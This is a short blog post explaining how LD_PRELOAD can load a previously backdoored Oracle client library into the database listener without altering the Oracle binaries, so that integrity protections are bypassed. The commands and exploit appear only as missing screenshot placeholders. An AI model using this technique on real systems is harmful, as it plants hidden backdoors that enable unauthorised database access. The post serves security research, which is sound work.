Using LD_PRELOAD to implement a hidden trojan in an oracle database

In one of my previous post  i showed how we can inject a backdoor in an ORACLE database based on Dennis Yurichev findings.The described method required the modification of the oracle executable files.  Few days ago Rodrigo Jorge shared a blog post explaining how we can add another layer of security to the oracle binaries files to protect them against improper changes. That motivated me to check if i still can implement the hidden Trojan without modifying the oracle executable files ?

As we are interested in oracle LISTENER  let’s check the required shared library :

Capture 500

So if i’m able to replace “libclntsh.so.12.1 ” with the one infected on my previous post the job is done.The “tnslsnr” program don’t have the set-user-ID or set-group-ID set as the “oracle” executable have so it’s not running in secure-execution mode (AT_SECURE entry) . We can then use the LD_PRELOAD  Environment variables to selectively override the shared library “libclntsh.so.12.1”.

Capture 501

Exploit :

Capture 502

That’s it 😀

REF :

 

 

2 thoughts on “Using LD_PRELOAD to implement a hidden trojan in an oracle database

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s